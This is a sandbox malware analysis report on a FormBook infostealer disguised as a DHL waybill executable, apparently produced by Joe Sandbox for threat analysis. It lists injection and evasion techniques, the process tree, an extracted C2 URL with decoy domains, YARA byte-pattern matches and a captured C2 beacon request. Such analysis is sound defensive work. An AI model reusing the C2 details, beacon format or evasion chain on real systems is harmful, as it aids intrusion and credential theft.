Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL WB# 2343640950.exe

Overview

General Information

Sample Name:DHL WB# 2343640950.exe
Analysis ID:635258
MD5:81e4012e3036befd629438ace2e798e2
SHA1:d5b34d7dd4d4255fd3279bdd99c98b9e760bb34c
SHA256:bcd31729e663369b99fd178377977c5de078512046d2cb4b38c51d80d9801374
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • DHL WB# 2343640950.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\DHL WB# 2343640950.exe" MD5: 81E4012E3036BEFD629438ACE2E798E2)
    • DHL WB# 2343640950.exe (PID: 6376 cmdline: C:\Users\user\Desktop\DHL WB# 2343640950.exe MD5: 81E4012E3036BEFD629438ACE2E798E2)
    • DHL WB# 2343640950.exe (PID: 6380 cmdline: C:\Users\user\Desktop\DHL WB# 2343640950.exe MD5: 81E4012E3036BEFD629438ACE2E798E2)
      • explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 4124 cmdline: /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.studiomayuko.com/183b/"], "decoy": ["textilestyle.online", "decorarteperu.com", "commonsensedigitalmarketing.biz", "yumkb.com", "brambletonsummercamp.com", "fug.life", "grandforest.space", "opmbettersvault.com", "rheintv.com", "blagodatbilja.store", "maxpw.com", "vital-roots.com", "lotte-finance5.com", "socalcrypto.network", "extra-pays.site", "mmaster.xyz", "electriccarsinfohubs.com", "qshid.life", "digitalqp.com", "golfsaudiarabia.com", "dreaminfolks.com", "smartlearningtoy.com", "paycheckstubonlin.com", "allsagesbookstore.com", "evicts.xyz", "universalorlandoyout.com", "mannaka-chokusou.com", "zhisou100.xyz", "century21judgefit.com", "taphrconsultancy.com", "simettrixstudio.com", "thebestutensilios.com", "diabeticinsurancebroker.com", "importantmarks.com", "masterpier.com", "spd201.com", "annuelcridetreport.com", "c2cvision.com", "smithridge.net", "teamsfos.com", "asiritatli.com", "dreamcastlesproperties.com", "care-supporters.com", "vw-4s.com", "216627.com", "xnotconotyogurt.com", "veganfund.net", "bricksofathens.com", "avroty.online", "thinkerquote.com", "registerbosc.com", "atlantarunningtours.com", "citragaming.com", "orientadorluismi.com", "eternaprimaverapr.com", "mysuperplate.com", "xydict.net", "clairetrost.com", "khopkhangtho.space", "budhu-law.com", "gaozhong.online", "sammserviices.com", "whiseltiess.com", "businessmindfulness.store"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      0.2.DHL WB# 2343640950.exe.6fd0000.9.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x51aaf:$s1: file:///
      • 0x519bf:$s2: {11111-22222-10009-11112}
      • 0x51a3f:$s3: {11111-22222-50001-00000}
      • 0x4ee11:$s4: get_Module
      • 0x4f257:$s5: Reverse
      • 0x512ee:$s6: BlockCopy
      • 0x51132:$s7: ReadByte
      • 0x51ac1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      5.0.DHL WB# 2343640950.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.DHL WB# 2343640950.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.DHL WB# 2343640950.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        5.0.DHL WB# 2343640950.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 26 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.studiomayuko.com/183b/"], "decoy": ["textilestyle.online", "decorarteperu.com", "commonsensedigitalmarketing.biz", "yumkb.com", "brambletonsummercamp.com", "fug.life", "grandforest.space", "opmbettersvault.com", "rheintv.com", "blagodatbilja.store", "maxpw.com", "vital-roots.com", "lotte-finance5.com", "socalcrypto.network", "extra-pays.site", "mmaster.xyz", "electriccarsinfohubs.com", "qshid.life", "digitalqp.com", "golfsaudiarabia.com", "dreaminfolks.com", "smartlearningtoy.com", "paycheckstubonlin.com", "allsagesbookstore.com", "evicts.xyz", "universalorlandoyout.com", "mannaka-chokusou.com", "zhisou100.xyz", "century21judgefit.com", "taphrconsultancy.com", "simettrixstudio.com", "thebestutensilios.com", "diabeticinsurancebroker.com", "importantmarks.com", "masterpier.com", "spd201.com", "annuelcridetreport.com", "c2cvision.com", "smithridge.net", "teamsfos.com", "asiritatli.com", "dreamcastlesproperties.com", "care-supporters.com", "vw-4s.com", "216627.com", "xnotconotyogurt.com", "veganfund.net", "bricksofathens.com", "avroty.online", "thinkerquote.com", "registerbosc.com", "atlantarunningtours.com", "citragaming.com", "orientadorluismi.com", "eternaprimaverapr.com", "mysuperplate.com", "xydict.net", "clairetrost.com", "khopkhangtho.space", "budhu-law.com", "gaozhong.online", "sammserviices.com", "whiseltiess.com", "businessmindfulness.store"]}
          Source: DHL WB# 2343640950.exeVirustotal: Detection: 47%Perma Link
          Source: DHL WB# 2343640950.exeReversingLabs: Detection: 21%
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DHL WB# 2343640950.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL WB# 2343640950.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: DHL WB# 2343640950.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: DHL WB# 2343640950.exe, 00000005.00000002.512345140.0000000003740000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL WB# 2343640950.exe, 00000005.00000002.509487219.0000000001870000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.418665497.000000000153E000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000002.510678175.000000000198F000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.421562441.00000000016DC000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.510313145.0000000000EED000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.508015747.0000000000D46000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642289231.0000000004680000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642488316.000000000479F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL WB# 2343640950.exe, 00000005.00000002.509487219.0000000001870000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.418665497.000000000153E000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000002.510678175.000000000198F000.00000040.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000005.00000003.421562441.00000000016DC000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000003.510313145.0000000000EED000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.508015747.0000000000D46000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642289231.0000000004680000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.642488316.000000000479F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: DHL WB# 2343640950.exe, 00000005.00000002.512345140.0000000003740000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.paycheckstubonlin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80
          Source: Malware configuration extractorURLs: www.studiomayuko.com/183b/
          Source: global trafficHTTP traffic detected: GET /183b/?3f=0pQLi&GTWHLhf=aeRI+VtYzSQE3A1d41SuiJFmY5rxFnxGMgk+ebPO7waK3tnPCQEIkRgDBSC82MoPtV6fY2DLrg== HTTP/1.1Host: www.paycheckstubonlin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 15:59:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.375029769.00000000055B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: DHL WB# 2343640950.exe, 00000000.00000003.377133904.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377503899.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378545531.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376858559.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378033564.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377574826.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378644300.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376377568.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378324382.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376750190.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377095056.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: DHL WB# 2343640950.exe, 00000000.00000003.377133904.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377503899.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378545531.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.380503275.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376858559.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.379031205.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378033564.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377574826.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378644300.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376377568.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378324382.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.381687286.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376750190.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377095056.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comttp
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: DHL WB# 2343640950.exe, 00000000.00000003.382147355.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: DHL WB# 2343640950.exe, 00000000.00000003.383046028.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383254350.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383176460.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383369016.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383430136.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383112465.00000000055D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: DHL WB# 2343640950.exe, 00000000.00000003.382147355.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427545975.00000000055A0000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.420192767.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371964876.00000000055DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com8
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371854007.00000000055DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comT?
          Source: DHL WB# 2343640950.exe, 00000000.00000003.374059324.00000000055AF000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: DHL WB# 2343640950.exe, 00000000.00000003.374059324.00000000055AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn%
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: DHL WB# 2343640950.exe, 00000000.00000003.386580488.00000000055E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370840690.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370831210.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com&
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com4
          Source: DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comhy/
          Source: DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370840690.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comw
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.paycheckstubonlin.com
